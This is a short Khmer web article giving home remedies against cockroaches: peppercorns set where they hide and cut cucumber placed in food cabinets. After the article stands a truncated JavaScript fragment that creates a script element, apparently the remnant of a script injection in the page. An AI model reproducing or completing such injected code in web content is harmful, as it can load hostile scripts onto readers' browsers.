អស់កង្វល់រឿងកន្លាត! វិធីងាយៗក្នុងការកំចាត់កន្លាតចង្រៃ អានបន្ត៖

វិធីទី១៖ យកម្រេចម៉ដ្ឋដែលប្រើប្រាស់ផ្សំអាហាររាល់ថ្ងៃទៅដាក់នៅតាមចំណុចផ្សេងៗដែលជាងជំរកលាក់ខ្លួនរបស់ពពួកសត្វកន្លាតនោះ ឬក៏ទីកន្លែងដែលវាលួចចេញមកស៊ីកំទេចអាហារដោយក្នុងកន្លែងនីមួយៗដាក់ត្រឹមតែពី ៤-៥ គ្រាប់តែប៉ុណ្ណោះ។ កន្លាតវាស្អប់ក្លិននេះហើយវានឹងមិនមកទៀតឡើយ។

-វិធីទី២៖ ក្លិនត្រសក់ធ្វើឲ្យហ្វូងកន្លាតភ័យខ្លាច៖ កន្លាតស្អប់ក្លិនត្រសក់ណាស់ ហេតុនេះអ្នកអាចកាត់ផ្លែត្រសក់ និងដាក់នៅក្នុងទូដាក់អាហារ។ ក្នុង១រយៈពេលណានោះ ប្រសិនផ្លែត្រសក់ក្រៀម អ្នកអាចកាត់ចោលផ្នែកក្រៀម និងបន្ថយបណ្តេញ សត្វកន្លាតបាន។ ដោយ៖ លោក អ៊ាង សុផល្លែត Sophalleth

image image imagevar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More